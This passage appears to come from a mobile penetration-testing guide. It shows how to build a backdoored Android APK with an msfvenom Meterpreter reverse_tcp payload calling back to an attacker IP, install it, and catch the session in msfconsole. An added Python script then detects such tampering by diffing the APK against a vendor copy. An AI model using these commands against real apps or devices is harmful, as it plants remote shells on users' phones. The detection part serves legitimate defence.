4.2 Quick Proof-of-Concept (Meterpreter)

This guide revealed to me a functionality which I was not aware of - msfvenom does everything for you!

This also works for Xamarin apps.

Create backdoored apk

msfvenom -x /path/to/target_app.apk -p android/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o target_modified.apk

Output: Saved as: target_modified.apk

Install application

adb install target_modified.apk

Start meterpreter session handler

(use the same payload, IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)
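
Seen from the defending side, target_modified.apk is no longer the vendor's build, and an entry-by-entry comparison against a trusted reference copy shows where it differs. The script below is an added example, not part of the original guide; the function names are hypothetical and the two sample archives are constructed stand-ins for real APKs.

```python
import hashlib
import io
import zipfile

def is_sensitive(name):
    """Entries carrying code, declared components or the v1 (JAR) signature."""
    return (name == "AndroidManifest.xml"
            or (name.startswith("classes") and name.endswith(".dex"))
            or name.startswith("META-INF/"))

def entry_digests(apk_bytes):
    """Map each ZIP entry name to the SHA-256 of its uncompressed content."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {i.filename: hashlib.sha256(zf.read(i)).hexdigest()
                for i in zf.infolist() if not i.is_dir()}

def diff_apk(reference_bytes, candidate_bytes):
    """Compare a candidate APK with a trusted reference build, entry by entry."""
    ref, cand = entry_digests(reference_bytes), entry_digests(candidate_bytes)
    report = {
        "added": sorted(set(cand) - set(ref)),
        "removed": sorted(set(ref) - set(cand)),
        "changed": sorted(n for n in ref.keys() & cand.keys() if ref[n] != cand[n]),
    }
    touched = report["added"] + report["removed"] + report["changed"]
    report["sensitive"] = sorted(n for n in touched if is_sensitive(n))
    report["code_or_signature_changed"] = bool(report["sensitive"])
    return report

def build_sample(entries):
    """Constructed stand-in for an APK: a ZIP holding name -> bytes entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed sample data: same resources, different code, manifest and signer file.
COMMON = {"res/layout/main.xml": b"<layout/>", "resources.arsc": b"table"}
VENDOR = build_sample({**COMMON, "AndroidManifest.xml": b"manifest-v1",
                       "classes.dex": b"dex-v1", "META-INF/VENDOR.RSA": b"cert-a"})
MODIFIED = build_sample({**COMMON, "AndroidManifest.xml": b"manifest-v2",
                         "classes.dex": b"dex-v2", "META-INF/SIGNER.RSA": b"cert-b"})

if __name__ == "__main__":
    for key, value in diff_apk(VENDOR, MODIFIED).items():
        print(f"{key}: {value}")
```

APK Signature Scheme v2 and later store the signature in the APK Signing Block rather than in ZIP entries, so confirm the signer with `apksigner verify --print-certs` and compare the certificate digest with the vendor's.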
